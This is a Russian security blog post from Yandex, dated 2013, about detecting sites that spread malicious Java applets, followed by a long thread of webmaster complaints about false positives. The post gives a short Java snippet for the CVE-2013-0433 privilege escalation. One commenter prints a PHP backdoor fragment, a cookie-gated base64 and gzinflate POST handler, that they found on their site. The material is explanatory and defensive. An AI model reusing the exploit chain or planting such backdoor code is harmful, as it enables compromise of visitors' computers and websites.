Блог о безопасности

Детектор сайтов, заражающих компьютеры посетителей с помощью вредоносных Java-апплетов

27 февраля 2013, 12:48

Как мы уже рассказывали, сейчас более чем в 2/3 случаев опасные сайты заражают компьютеры пользователей, загружая в браузер вредоносные Java-апплеты. Такое заражение может происходить при регулярном обновлении браузера, в некоторых случаях – даже если используется ОС не от Microsoft. Если на компьютере нет виртуальной машины Java, заражённый сайт «заботливо» предложит установить её версию с уязвимостью, после чего повторно атакует компьютер пользователя.


Чтобы обнаруживать сайты, использующие этот способ заражения, Яндекс запустил специальный поведенческий детектор вредоносного кода для Java-приложений. Он позволяет детектировать обфусцированный вредоносный код, который использует самые популярные на сегодняшний день уязвимости JRE. В результате с начала февраля было обнаружено более четырех тысяч зараженных сайтов, суммарная посещаемость которых до заражения достигала 1,5 млн. пользователей в сутки. На графике показано количество сайтов, использующих вредоносные Java-апплеты, которые выявляются системой ежедневно:

 




Одним из наиболее актуальных способов распространения вредоносного кода на сегодняшний день являются Java-эксплойты, которые встречаются в любом эксплойт-паке. Такая популярность обусловлена несколькими факторами:


• использование Oracle Java более чем на 3 миллиардах компьютеров;
• кроссплатформенность эксплойтов;
• относительная простота эксплуатации уязвимостей;
• в большинстве случаев Java-плагин включен в браузере.

Java-эксплойты обрели широкую популярность у злоумышленников из-за большого количества логических уязвимостей в Java. Такие уязвимости позволяют выполнить произвольный код незаметно для пользователя, потому что их использование обычно не сопровождается падением процессов браузера или виртуальной машины Java. С 2010 года злоумышленники использовали для заражения уязвимости CVE-2010–0806, CVE-2010–4452, CVE-2011–3544, CVE-2012-0500 и CVE-2012-4681, а с самого начала 2013 года стали активно использовать новую уязвимость СVE-2013-0433.

 

Рассмотрим СVE-2013-0433. Суть этой уязвимости заключается в том, что при помощи уязвимого метода com.sun.jmx.mbeanserver.MBeanInstantiator.findClass можно получить ссылку на класс из любого пакета по имени класса. Однако конструктор класса MBeanInstantiator является приватным и не может быть вызван напрямую. Нужная ссылка на объект класса MBeanInstantiator содержится в экземпляре класса com.sun.jmx.mbeanserver.JmxMBeanServer и может быть получена при помощи метода getMBeanInstantiator.


Класс JmxMBeanServer имеет публичный конструктор. Таким образом чтобы повысить свои привилегии, достаточно выполнить:
javax.management.MBeanServer ms =
com.sun.jmx.mbeanserver.JmxMBeanServer.newMBeanServer("any", null, null, true);
com.sun.jmx.mbeanserver.MBeanInstantiator mi =
((com.sun.jmx.mbeanserver.JmxMBeanServer)ms).getMBeanInstantiator(
Class clazz = mi.findClass("some.restricted.class.here", (ClassLoader)null);


Чтобы заразить компьютер пользователя, злоумышленники размещают на зараженной веб-странице вредоносный код, например:

 


После посещения страницы происходит цепочка редиректов:


Посмотреть на Яндекс.Фотках

В итоге пользователь перенаправляется на страницу с эксплойтами:


Посмотреть на Яндекс.Фотках

При наличии уязвимой версии Java, вредоносный апплет 887.jar повышает свои привилегии в системе, загружает и запускает вредоносную программу.

 

По данным сервиса VT на 12.02.2013, рассмотренный вредоносный апплет детектируют 5 антивирусов из 40, а устанавливаемое с его помощью вредоносное ПО не детектирует ни один антивирус из 40.

 

Злоумышленники почти всегда обфусцируют или шифруют вредоносный код внутри Java-апплетов, что позволяет им обходить сигнатурные методы детектирования. Так, рассматриваемый образец после декомпиляции имеет вид:



Посмотреть на Яндекс.Фотках

Все строковые константы, встречающиеся в данном апплете, обфусцированы, имена переменных и классов изменены на случайные. В апплете эксплуатируется описанная уязвимость СVE-2013-0433:



Посмотреть на Яндекс.Фотках



Чтобы избежать заражения, мы рекомендуем:

 

  • использовать актуальные версии ПО, обязательно обновлять Java и другие плагины;
  • отключить в браузере запуск Java-апплетов по умолчанию, и подтверждать их запуск только для доверенных сайтов;
  • использовать обычные антивирусы и следить за регулярностью обновления антивирусных баз;
  • ознакомиться с рекомендациями Яндекса по безопасности в Сети и следовать им.


Команда Безопасного Поиска Яндекса

155 комментариев
Подписаться на комментарии к посту

Это просто смешно

все пишут об одном и томже, робщут, ищут вирусы там где их нет

представители Яндекса не дают советов

Это похоже на расстрел без суда и следствия, без доказательств навечно банят.

 

Я несу убытки, как и все мы, низа что.

Доказательствa Доктор Веб

Юридически можно требовать компенсации за утраченную репутацию.

Нам нужны четкие доказательства и конкретные действия по каждому случаю в отдельности, а не описание алгоритмов и удобочитаемые инструкции.

Логика которых понятно только их автору, чем больше им следуешь, тем глубже твой сайт опускается.

Что вот сейчас делать?

Конкретно что?

Я свой сайт http://avia3.ru создавал как прибавка к пенсии брату инвалиду. Предлагаю Яндексу самому занятся помощью. Обязательно пришлю реквизиты.

Согласен, идиотизм полный, особенно радует то, что зараженными оказываются страницы preview - которые и существуют-то во время просмотра. Как их детектировали? во время моего просмотра?

А я люблю вирусняк и опасности.)))

антибиотики и головная боль....ваши спутники !!!

Спасибо за информацию-но я не увидел ничего нового в этом совете.

Какова вероятность ложных срабатываний?
У меня на одном сайте все время что-то находили, хотя код чист, за 2 месяца проверил все что мог. Когда сменил дизайн шаблон с другими скриптами меню Яндекс перестал бить тревогу.

У Sophos вероятность false positive меньше 0,5%, у чёрного списка и поведенческихдетекторов, в т.ч. детектора заражения с помощью вредоносных Java-апплетов - меньше 0,02% . А вы откуда предыдущий шаблон брали? Злоумышленники могут вставлять в шаблоны вредоносный код и выкладывать, мы о таком писали.

Не собирается ли Яндекс создать онлайн ресурс, или выпустить дополнение к браузеру, позволяющее протестировать сайт на предмет наличия вредоносного кода?

Очень нужен онлайн сервис Яндекс показывающий зараженные файлы на сервере. А лучше (по крайней мере для меня) позволяющий подключить его непосредственно к сайту и позволяющий сносить (удалять) зараженные файлы или их подлечить.

Присоединяюсь

Вот есть такой ресурс: virusdie.ru

и я присоединяюсь

Винокуров Иван
1 июня 2013, 22:00

ТОЖЕ ОЧЕНЬ ХОТЕЛОСЬ БЫ! уже 2 раз блокируется сайт..через пару дней угроу снимают. в чем проблема до сих пор не поняла...

Мы получаем сообщения, что на нашем сайте страница содержит вредоносный код. Из-за этого сайт в результатах поиска выводится, сами знаете, как.. Программисты ничего абсолютно не обнаружили, никаких скриптов. Создаётся впечатление, что кто-то нарочно отпугивает  посетителей от нашего сайта.

присоединяюсь

анналогично, уже неделю бьюсь что бы найти что тут у яндекса с мозгами не так....уже и файлы поменял все, и откат сделал...все равно он "что то видит"

аналогично..не знаю уже что делать

поддерживаю, два месяца не могу вернуть сайт к нормальной работе после рердикта поведженческий фактор... уже бэкапы восстанавливал годичной давности... уже кучу скриптов поудалял, все равно нифига не помогает

 

 

sochiprostitutki.com
22 ноября 2014, 20:23

Муть помоему от Яши... Стоит на сайте антивирус, достаточно крутой платный. Во всём мире всё пучком а вот яндекс мониторит типа вирус - новый развод какойто очередной. У меня каждая страница сайта в день три раза пасётся антивирусом

Вот таким способом можно избавлятся от любых сайтов. Заблокировали сегодня и мой сайт Никаких пояснений и тем более никаких упоминаний о вредоносном коде. Показали бы хоть кусочек того, на что ругается. А так просто у вас обнаружено и досвидос. Интернет уже не тот что был раньше. :-$

Присоединяюсь.

akimov.karabin87
9 июля 2013, 20:35

И я тоже со всеми за!!!! Ваще не понятно раньше ни че не блокировалось, теперь код какой то вредоносный нашелся! Фиг поймешь где его искать.

Не совсем то, что вы просите, но возможно вам поможет этот сервис http://nazamok.com

Пользуюсь им уже больше года, очень помогает оперативно обнаружить взлом и все убрать, пока яндекс не спалил и не наложил санкции.

Спасибо, пробую там ...

А да, еще добавлю, в техподдержке там очень хорошие ребята, сколько раз меня спасали и чистили сайты от вредоносного кода. Так что если самим не получается найти код, пишите в обратную связь и вам почистят все за символическую сумму. А еще дадут кучу рекомендаций по безопасности.

Слава богу у меня сайт чистый. И пока не возникало таких проблем...

Очень нужен такой инструмент, так как выяснить какой код по мнению Яндекса вредноностный, весьма затруднительно. Проблемы с "Поведенческим анализом" - вообще не понятно как решать, код исходника трактутеся как вирусный - жесть!

у меня тоже 3 страницы указаны под поведенческим..я в шоке..что делать, что искать

При поведенческом анализе (судя по отзывам), злоумышленник дописывает код в JS-файлы или в теги, искать нужно по слову iframe.

 

присоединяюсь

на моём сайте этот детектор обнаружил несуществующую угрозу и теперь банит сайт, пока я не устраню вредоносный код. А как его устранить если его нет?

у меня тоже в исходном коде, указанной яндексом страницы как заражённой, нет никаких сторонних ифрэймов. А сайт опустили по самое небалуйся. Что удалять, лечить непонятно.
Особенно мне непонятна эта приписка о софрос "Для выявления вредоносного кода используются собственные технологии Яндекса и антивирусный продукт компании Sophos (R). Яндекс не гарантирует точность Информации и не возмещает никакой ущерб, прямой или косвенный, причиненный в результате использования или невозможности использования Информации, включая, но не ограничиваясь этим, убытки, вызванные неточностью предоставляемой Информации."  что за точность своих диагнозов они не ручаются.
А ещё непонятно, если уязвимость в браузере, то почему она не тронула другие сайты на другом хостинге, а периодически лихорадит в одном и том же месте. Так где рыть? Хостинг? Шаблон полгода работал ОК, и снова здрасте...
Люди!!!!!!!!!!!!! Спасите наши души :-)

И у меня - такая же история!

тоже самое!!!! шаблон работал без проблем. на сайте только тексты, ничего лишнего. проверка от 9 апреля - вирусов нет. а сегодня вдруг вирусы! откуда господа им взяться если сайт не менялся все это время

страница ошибки 404 и та классифицируется как вируснутая. а там 2 строки текста и все! где вирусы? если классифицируете как вирус то показывайте хотябы где он есть. у меня вообще ощущение что это сделано специально

 

 

И вообще, мне кажется что вирусы пишут те же люди, что и антивирусы. У меня стоит бесплатный комодо, который все хвалят. За последнее время, в комодо новостях, всплывала ссылка с предложением купить комодо. Я не купила. Через какое-то время вирус на сайте, через короткое время опять. По-моему эти антивирусы имеют полный доступ к компу и кто им мешает таким образом влиять на наше поведение. Ага, не купил, вот и получи. А у моей подруги стоял платный касперский, а деньги вэбмани украли всё равно.
Два дня меня опять клеймил софрос. Сегодня сняли клеймо. А я пока искала причины обнаружила странную вещь, что исходный код сайта в различных браузерах в конце различается, а точнее только в файерфокс мозилла дописываются ссылки чужие, а в других браузерах нет. Причём они дописываются в режиме невидимости и RDS bar их не видит. Может это браузер чудит? А как его лечить?

Это похоже на серверный вирус, он перехватывает обработку js файлов и делает перенаправление на порно, атакующий сайт и т.п. А самое интересное, вирус срабатывает по определенным правилам и только в мозилле.

Поищите на хабре
Яндекс оказался прав. Я нашла таки "чужих" на своём сайте.

Привет! Буду очень признателен если скажешь где нашла..а то таже проблема..(( Банян а я тут проект днями допиливаю..обидно. Мой ящик intmarkgroup@mail.ruю За ранее спасибо

Помогу очистить сайт от вирусов
daemon8989@gmail.com

akimov.karabin87
10 июля 2013, 09:43

а можно и мне подсказать пожалуйста как и где их искать? akimov.karabin87@yandex.ru Буду очень благодарен!

Да, особо нечем хвалиться. Нашла, удалила...и так уже с полгода...периодически. Уменя оказались подвержены заражению папки images и вложенные, а именно этому подвержен .gif формат, под него маскировались различные скрипты. Пришлось запретить загрузку гифов в основных настройках. Потом нужно поставить плагин jhackguard, который тоже защищает от взлома.
Потом я написала в яндекс, они ответили сто заражен скрипт однакнопка, но он подгружается с их сервера и надо им написать. Я писать не стала, просто удалила.
Но воз и ныне там...Явных следов "чужих" не видно, а сайт всё метится как зараженный.
Так что если вы найдёте выход, то пишите, делитесь спасением для всех и со всеми :-)

Мне помогли на хостинге, указав тоже на плагин однакопка. Удалила и вот жду перепроверку... теперь чего-то сомневаюсь.

Мы получаем сообщения, что на нашем сайте страница содержит вредоносный код. Из-за этого сайт в результатах поиска выводится, сами знаете, как.. Программисты ничего абсолютно не обнаружили, никаких скриптов. Создаётся впечатление, что кто-то нарочно отпугивает  посетителей от нашего сайта.

Все время работал как надо и вдруг вирус. Действительно, господа, следовало бы указать где найден вирус, а то ищи то не знаю что.  Как диверсанты действуют. Опустили сайт и рады.

То же самое и у меня...

Не банит, а показывает предупреждения на выдаче. То, что вы не нашли, не значит, к сожалению, что его нет - злоумышленники стараются, чтобы их код прожил как можно дольше, и старательно его скрывают. Как устранить - написано здесь . Если не получится - напишите в тех. поддержку, ссылка на форму есть на странице "безопасность" Яндекс.Вебмастера.

как там написано - все проверено, ничего такого нет. сайт проверен всеми возможными антивирусами - все чисто. а яндекс ругается

Татьяна
26 мая 2013, 22:41

У меня аналогичная проблема! 

belozerovalexander
10 апреля 2013, 20:29

Все тоже самое. После выявления и удаления вредоносных скриптов. Яша так не хочет убирать значок с заражением сайта. Уже и все страници поудалял на которые там было указано. Во всех проверках сайт чист.

Ну почитал возмущения каждого.

А где ответы Яндекса?

Где искать "Вирус" если его у всех нет?

Нет четких инструкций, зато есть наказание вечное

Если Яндекс не может точно указать причину, то чё он точно банит.

Так можно любой сайт убить

На кой чет такой поисковик нужен.

Давайте требовать компенсации за потери.

 

Комментарий удалён
Yandex - занимайся своим делом, индексацией.  Кроме Вас в инете дохрена "полицаев" от которых жизни нет (Каспер, Eset, Spamhouse и.т.д).

Такая же хрень как у многих. Сайт заражен. Все проверил нет ничего. Ни онлайн-проверки ни внутреннее копание ничего не нашли. 

Такаяже фигня! Нет ни фреймов не pop up не вредоносных кодов... а сайт банится... безобразие

У меня такая проблема сплывает за последние 2 месяца второй раз. Сайт чистый, яндекс то убирает предупреждение о вредостности, то опять ставит. Что делать то???

Присоединяюсь к предыдущим авторам - скачал весь сайт, проверил антивирусом - ничего не обнаружено. Тем не менее сайт в списке нехороших, да и еще мошенником меня обозвали! Супер. Вы скажите конкретно - какие файлы заражены, а то наводят тень на плетень и думай что хочешь!

Согласен, сегодня отправили скрин и запрос в саппорт, посмотрю что ответят.

То же самое, ни один сканер и ни один поисковик, кроме яндекса, не считает мой сайт зараженным. Проверила всеми возможными сканерами, нет ничего. 

Ghbdtn? поделись пожалуйста чем проверяла сайт? Мой тоже загремел под вирусы
Игорь Артамонов
21 апреля 2013, 08:11

Аналогично, сайт проверил, никакой из антивирусов ничего не нашел, а Яндекс поп режнему утверждает что "Поведенческий анализ" и это бы полбеды если бы выдавал страницы на которых по его мнению есть код вируса. Что делать с этим понятия не имею, куда бежать, кому жаловатся?

http://online3.drweb.com/cache/?i=aff78ab62a21ec26fa062edab29499b5

А мне вот дико интересно по какому праву яндекс берёт на себя функцию контролирующего органа?  При том "Яндекс не гарантирует точность Информации и не возмещает никакой ущерб...", но табличку порочащую честь собственика сайта вывешивает исправно. Так если яндекс не гарантирует... тогда чего ярлыки навешивает? Интересная ситуация выходит: Якобы система яндекса находит по каким-то критериям якобы вредоносный код, значит системе известно какой код на данном сайте вредоносен, но вебмастер вынужден искать его самостоятельно! Я проверил сайт двумя авторитетными антивирусами и просмотрел вдобавок весь код, указанной яндексом страницы вручную , но ничего не нашел. Великолепно! "идите туда не знаю куда, ищите то - не знаю что..." Что это такое?! А если потребовать разьяснений, то указывают на лицензию яндекс, где яндекс ничего никому не обязан... Класс! Никаких обязанностей - одни права! В сложившейся ситуации  думаю разумно будет запретить роботам яндекса индексировать мой сайт, ведь такая антиреклама, которую устраивает Яндекс, никак не способствует посещаемости сайта.


Всё просто. Раз у Яндекса нет конкурента в Рунете, то так и будет - это монополия. Не зря с такими проявлениями так яростно борются во всём мире. Но увы. Кто напишет новую поисковую систему? Судя по снижению уровня образования...Будет ли конкурент?
Яндекс не является и не собирается становиться контролирующим органом. Мы просто защищаем наших пользователей от переходов на страницы, которые могут заразить компьютер при просмотре, предлагают скачать вредоносные файлы, пытаются обмануть пользователей и «развести» их на деньги или учётные записи. Пользователи приходят к нам не за такими страницами. Заботиться о пользователях – не право, а обязанность.

Повторюсь: то, что владелец сайта или файловый антивирус чего-то не нашёл – к сожалению, не показатель, а ошибочная разметка – редкость. Ищите, есть Помощь, есть раздел "Безопасность" в Вебмастере, есть этот блог, в нём разобраны самые частые и общие случаи заражения, есть масса других ресурсов и инструментов, посвящённых безопасности сайтов.

Дохрена интернет-полицаев развелось в Росси
Достали уже.
На сайте swfgamer.ru обнаружен потенциально опасный код 9.07.2013
Перепроверка сайта swfgamer.ru не выявила потенциально опасного кода 8.07.2013
На сайте swfgamer.ru обнаружен потенциально опасный код 8.07.2013

http://swfgamer.ru - Ok
http://online3.drweb.com/cache/?i=a7d89ec0e6cc144afc6d29fb382e09fc

Таже пурга.Главное концов не найти.Что за вредоносный код?Где он?Все проверил -чисто.Вирусов нет,кодов вр.не наблюдаю...Пользователи шарахаются от резюме о сайте от Яндекса. Хотя бы указывали на пролему - где ,в чем она ,конкретными ссылками,а то на держи "бакшиш"....

В других поисковиках нормально,все в порядке,только в Яндексе........ничего не понятно,что такое?.........

также без причин забанил сайт, я удалил вовсе ту страницу где якобы вирус, послал на перепроверку яндексу, опять ссылается на нее!!! это хрень полная и БЕЗПРИДЕЛ!

1. яндекс в игнор

2. запрет ему вообще на индекс наших сайтов

3. переходим дружно на Гугл

Пользователей не уговоришь переключиться на менее "борзый " поисковик. :(

Сегодня получил весточку, все та же лобуда, как и у коллег по несчастью: ни собственный поиск, ни сканирование dweb ни другими онлайн сканерами результатов не дали. Ничего там нет.

Но хамство растет и ширится. Инфа то о обнаружении вредоносного кода и дебильный, и как все у Яндекса, недокументированный "Поведенческий анализ" пришло пписьмо на сайт   домен.ru.

Какова же была моя радость :), когда обнаружил, что в поисковой выдаче и на сайт SHOP.домен.ru, расположенный на другом сервере и работающий на другом движке, яндекс вешает «Этот сайт может угрожать безопасности вашего компьютера» !

Ну отписал в техподдержку, как понимаете, без особой надежды. Пока ничего кроме отписок от Яндекса не получал, думается , что и сейчас они легко докажут, что монополист всегда прав....

Вредоносный код может находиться в элементах, общих для всех страниц (например, .js-библиотеки или скрипты партнерских программ). Вероятно, страница, возвращаемая по удаленной ссылке, все еще содержит этот код.

 

Вы всегда можете обратиться в нашу службу поддержки, чтобы узнать, какой код стал причиной реакции антивируса.

И я с Вами согласен, но не в моем случае.

Сайт , на который ругнулся Яндекс построен на Joomla то есть все страницы портальной системы безопасны, кроме одной.

Прикол в том, что эта единственная содержит в себе следующий "вредоносный" код, отличающий ее от безопасных, по мнению Яндекса, страниц:

Ремонт принтера , монитора, многофункционального устройства ?


Мы осуществляем такие услуги. Не имеет значения марка, формат и производительность.


Обслуживаем организации.


 


В разработке...


 


 


 Перечень выполняемых работ и услуг приведен ниже.


Прейсурант доступен зарегистрированным пользователям и вывешен в общем доступе в нашем сервисном центре.



 




Да, это все отличия, да - это примитивная заготовка в несколько строк простого html.

Так, что  все говорит о том, что это ложное cрабатывание и весьма беспардонное поведение Яндекса, присвоившего себе права цензора.

Есть подозрения, что если вновь опубликовать ( она не удалена, а снята с публикации) эту страницу, то и Яндекс признает ее безопасной.

НО проверить это нет технической возможности, причем не у  меня, а у Яндекса, не способного обеспечить вменяемую логику работы собственного антивируса, чему подтверждение цитата из переписки с техподдержкой:

"При обнаружение вредоносного код на основном домене мы помечаем в поисковой выдаче и все поддомены, таков алгоритм работы антивирусного комплекса.
Лог антивирусного робота, содержавший информацию об обнаруженном на основном домене вредоносном коде, автоматически удаляется после успешной перепроверки, поэтому определить точный источник заражения уже невозможно, сожалею. "

Обратиться то можно - результата не будет!

Вот здорово, нас извещают о будто бы заражении, ничем не подтверждая сей факт, вешают "черную метку " на все сайты в домене, вводят в ступор массу клиентов и посетителей, а потом говорят , что доказательств, логов и документирования и нет. Если прошел очередную проверку, значит удалили гадость в результате лихорадочных попыток поиска "черной кошки в темной комнате...", а если мы такие жуки, что имеем под рукой оригинал "зараженной" страницы, тогда рискуем , включив ее , вновь получить "подарок" от Яндекса на всех сайтах домена.

Короче - это все равно , что разместить нецензуршину на сайтах, ведь прикольно будет, и за это ничего. Пока в Яндексе до этого не додумались? :)

А по сути тоже, что творится сейчас.

Порой слов не хватает - одни шипящие!

Предложил техподдержке  включить публикацию страницы, дабы докопаться до истины, если Яндекс предложит вариант включения подозрительной страницы сайта, без навешивания ярлыков на все сайты в домене. Вот жду ответ..

Честно,  ожидаю стандартного ответа , означающего:  "мы так работаем и ничего менять не будем, а вы трахайтесь как хотите" Ну не будет же столь Великий Яндекс напрягаться - пипл то схавает :(

Продолжаем монолог.

Итак, с 29 апреля по  6 мая. Ответа техподдержки нет.

Но случились чудеса за это время.

Уехал на дачу, т.е. никаких действий не предпринимал.

2 мая Яндекс вновь детектирует опасность на моем сайте

3 мая Яндекс говорит , что сайт чист как младенец

4 Мая Яндекс говорит, что сайт заразен.

Ни разу Яндекс не говорит , что ему не нравиться

При этом клевещет  совершенно хамским образом на безопасные сайты в домене.

Справедливости ради отмечу, что чужеродный код был найден мною на сайте ( ночь 5-6 мая).

Но , судя по тому, что все остальные системы не считают его опасным, есть сомнения в его дееспособности и опасности.

Ладно, разумеется, вычистил, но вопрос то в другом:

При чем тут не зараженные сайты?

Если бы перед входом в офлайновую  фирму , некий дядя повесил вывеску "Осторожно!!! Здесь опасно для Ващего здоровья" - полиция , или психушка ему почти гарантирована, а уж битая морда на 100%!.

 

Александр, если возможно, сообщите нам адреса сайтов, о которых идет речь - мы проверим, что на них обнаружил антивирус и почему долго не было ответа от техподдержки. Можно на адрес safesearch@yandex.ru.

7 мая - получил ответ от техподдержки, что у меня было вот это -Troj/JSRedir-LH.

Поскольку личность гнусная и сильно обиженная навешиванием "Черной метки" на невинный сайт, имею копию зараженного сайта на локали.:-)

Вердикт Яндекса:

  

105. Troj/JSRedir-LH

    Данный вердикт означает, что в разметке страницы присутствует подгрузка JavaScript-кода (имена переменных и функций могут отличаться для каждого конкретного скрипта), который после выполнения перенаправляет пользователя на сайт, распространяющий вредоносное ПО. Как правило в данном случае заражения сайта указанный код дописывается в начало всех js файлов на сайте.


Шаг 1 - ищем зараженные страницы:
Поиск по всем текстам  в зараженной копии сайта
Document.write('scr="http://                     - нет результата
Что означает (понимаю , что почти означает, но с немалой ведь вероятностью) , что в разметке страницы НЕ присутствует подгрузка JavaScript-кода

2. Ищем далее источник заразы:
(@base64_decode -  Найден в 14 отдельных файлах типа 6258e...php
код следующий

if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo 'bg';
  exit;
}}
?>


Что означает (и Яндекс советует, и здравый смысл), что эту гадость следует удалить, во избежание заражения. Точнее , . цитирую Яндекс:

чтобы не допустить повторного заражения



Таким образом, сайт еще не был заражен и паразитный код еще не был внедрен в страницы сайта а я уже получил "Черную метку" на все сайты в моем домене.
Забавный способ предупреждения об опасности выбран Яндексом!

А просто предупредить нельзя?

Ведь зная конкретику -Troj/JSRedir-LH ( это вам не вердикт "Поведенческий анализ"), лечение занимает всего несколько минут, И САЙТ НЕ БУДЕТ ДИСКЕДИТИРОВАТЬСЯ НЕСКОЛЬКО ДНЕЙ

Так почему бы  сразу не указать на потенциальную угрозу?

А "метить" только реально зараженные сайты? Слабо?

Почему бы тогда не блокировать весь Рунет?

Интернет опасен для здоровья Вашего компьютера!!! 

Яндекс заботиться о Вас!

:-)

Мне тоже, думается, что даже при ложном срабатывании Яндекс вешает свою рекламу на МОЁМ сайте на несколько дней. А кто ему это разрешал? Я допускаю мысль, что Яша имеет право повесить свою рекламу, если юзер перешёл на мой сайт с поисковки. А почему там висит реклама Яши когда юзер ввёл адрес вручную? По какому праву ?

Это конечно хорошо, что отечественная компания внедряет инновационные методы, но...

Тоже обрадовали "поведенческим анализом" и навесили клеймо на сайт.

Все доступные проверки произвел - чисто (хотя я конечно не спец it-безопасности).

Было бы правильно, на мой взгляд, выдавать предупреждение в поиске (либо временное исключение из оного) только при ПОЛНОЙ уверенности в зараженности сайта, а при сомнениях -  только сигнализировать вебмастеру.

Очень легко испортить репутацию сайту, а восстановить уже сложнее, ибо "осадочек останется" у посетителей.

А яндекс "не гарантирует точность Информации и не возмещает никакой ущерб..."

Написал в поддержку (впервые кстати), может хотябы уточнят что именно не понравилось яндексу, но устраивает всех остальных. По крайней мере будет хоть какая-то ясность.

Это и ужасно, что никакой ответственности Яндекс на себя е берет. А вот обо..ать чистый и уважаемый ресурс в 2 счета - ничего не стоит! У меня история о которой здесь пишут, как оказалось, многие. Так же сайт признан с вредоносным кодом, кода при проверке разными антивирусами не обнаружено, но время идет - сайт под "вредоносной меткой" - и никто ни за что нихрена не отвечает. Безобразно все то, на что не найти управы. Яндекс пользуется привелегией монополиста - вот и ведет себя как хочет!

 

Если Яндекс не уверен – он и не показывает предупреждений пользователям.

«Поведенческий анализ» выносится, когда при заходе на страницу сайта происходит успешная drive-by-download атака и компьютер пользователя оказывается заражён. Его точность существенно больше, чем у вердиктов, основанных на Sophos и чёрном списке.

Злоумышленники могут включать и выключать распространение вредоносного кода с вашего сайта – они так пытаются «сбить» детектирование. Кроме того, через некоторые партнёрские программы вредоносный код распространяется не постоянно, а время от времени.

Большинство антивирусов, работающих на клиентском компьютере, не предназначено для того, чтобы находить вредоносный код внутри скриптов, настроек, бинарных файлов веб-сервера.

Помогу в удалении вирусов с Joomla, Wordpress. От 1000 рублей.
DANIL-HTML.RU - Отзывы. 

Уважаемая "Команда безопасного поиска"

Часто желание достичь благих целей , обретает форму обратную изначальной цели. Крайне рекомендую перечитать роман-антиутопию Джоржа Оруэла "1984".

Там есть такое понятие "мыслепреступление" - зачем дожидаться пока индивид совершит что ни будь противозаконное, если можно устранить его еще на этапе подозрения.

Полагаю, что ваша система защиты поступает аналогично.

Система действующая столь топорно, тупо , наносящая такой вред,  не должна выностить "приговоры" нашим сайтам.

Потратив немерянно времении на неконструктивный диалог с техподдержкой Яндекса, не получив ответа на сущетсвенные вопросы, убедился, в том, что Антивирус Яндекса в мае 2013 года , обнаружив на моем сайте следы попытки его заражения в середине 2012, повесил "черную метку" на давно безопасный для пользователей сайт, не имеющий внедренного вредоносного кода, при этом  дискредитации подвергся еще и другой сайт, только потому, что находился в том же домене.

Господа, я полагаю, что данные действия безответсвенны и  непрофессиональны..

Но Яндекс никогда не признает ошибок! Не извиняется за свои "косяки".

А "техподдержка", увы, часто выполняет лишь роль брони, цель которой одна- защита мундира.

В подтверждение сего, публикую всю бесполезную переписку с техподдержкой. 

Особенно характерна  подмена понятий и вольная трактовка в угоду ситуации:

В вердикте Яндекса:

Данный вердикт означает, что в разметке страницы присутствует подгрузка JavaScript-кода (имена переменных и функций могут отличаться для каждого конкретного скрипта), который после выполнения перенаправляет пользователя на сайт, распространяющий вредоносное ПО. Как правило в данном случае заражения сайта указанный код дописывается в начало всех js файлов на сайте.

Но если подгрузки кода нет, то техподдержке же достаточно зацепиться за просто наличие неких php файлов, созданных год назад:-)

 

Исходя из 2-го пункта Вашего письма видно, что найденный Вами код в php файлах соответствует тому, который отвечает вердикту Troj/JSRedir-LH. Это
достаточное доказательство
того, что вредоносный код был на Вашем сайте и именно по этому он был помечен в поисковой выдаче. Почему в Вашей архивной копии отсутствует вредоносный в js-файлах я прокомментировать не могу, сожалею.Введите текст цитаты


Коллеги - пострадавшие!

Не верьте Яндексу - вовсе не факт, что сайт заражен, и уж совсем не факт, что опасен.

Ничего внятного добиться невозможно, какой бы доказательной базой вы не обладали. С той стороны не особо вникают. Стена! :(

Вам судить, возможно ли более конструктивное и аргументированное отношение со стороны владельца сайта и есть ли результат.

Мне жаль потраченного времени:

Невозможно найти ни черную, ни белую кошку в той самой темной комнате, если их там никогда и не было!

 Хронология переписки , разумеется,  снизу вверх:

И вновь взяли меня сомнения в своей правоте.
Поднял архивы  на хостинге от 2013-04-21 15:05:53 - и еще более ранний от 2013-03-31 22:29:50.  - результаты идентичны :
1. Присутствуют файлы с вредоносным кодом типа b39d4192.php
2. Отсутствует js код, якобы обнаруженный на моем сайте.

В чем отличие от ситуации после 4 мая?

В том, что и 31.03.2013 и  21.04.2013  супер защита Яндекса считала этот сайт , с лежащими в папках вредоносными PHP
 файлами, абсолютно  безопасным.
Возможные причины этой странной ситуации :
1. Вредоносный код еще не был активирован - нет никаких оснований всеръез рассматривать как причину, поскольку
 тогда после обнаружения 4 марта должен появиться js код в зараженных страницах, а он не обнаружен ни до , не после, (как указывалось ниже его нет в утреннем архиве от 5 мая) не найден он был и в процессе "лечения".

2. Попытка заражения, то есть интеграция js кода была предпринята давно, но не удалась и Яндекс обнаружил лишь эти следы усилий злоумышленников - Очень похоже на правду.
Думается  Вам будет интересно узнать: что  даты создания паразитных PHP файлов не позднее 2012  года.

Итак,  Яндекс пометил сайт на основании лишь подозрений, и никакого обнаружения кода и не было.
Все выше и нижесказанное подтверждает эту версию, поскольку нет никаких доказательств присутствия опасного для пользователя js кода на страницах сайта.

В качестве документального подтверждения имеются архивные копии сайта на глубину до 27.01.2013

Что характерно:  и  во всех случаях  все это время сайт был и остается не опасен для пользователей.

Таким образом , отсутствие внедренного в страницы опасного для пользователей кода вызывает как раз глубокие сомнения в деятельности Яндекса, означает ошибочность вердикта и неправомочность "черной метки" повешенной на мой сайт.

Кроме того, прошу все же не понятно каким образом "зараженный сайт" прошел проверку, если никакие действия по "лечению" не производились в этот период :
"Здравствуйте,  Александр!
Последняя проверка сайта 3 Мая 2013 не выявила страниц, содержащих вредоносный код. В результатах поиска сайт выводится без пометок.---
С уважением,
Яндекс.Вебмастер"


С уважением, Александр


12.05.2013, 14:13, "Yandex.Search support" <support@search.yandex.com>:
>  Здравствуйте, Александр!
>
>  Исходя из 2-го пункта Вашего письма видно, что найденный Вами код в php файлах соответствует тому, который отвечает вердикту Troj/JSRedir-LH. Это достаточное доказательство того, что вредоносный код был на Вашем сайте и именно по этому он был помечен в поисковой выдаче. Почему в Вашей архивной копии отсутствует вредоносный в js-файлах я прокомментировать не могу, сожалею.
>
>  Что касается разметки поддоменов, то в предыдущих письмах я описал почему это происходит. Как я уже писал ранее, я передал Ваше пожелание нашим разработчика, но никаких сроков рассмотрения и изменения алгоритмов мы не можем гарантировать.
>
>  --
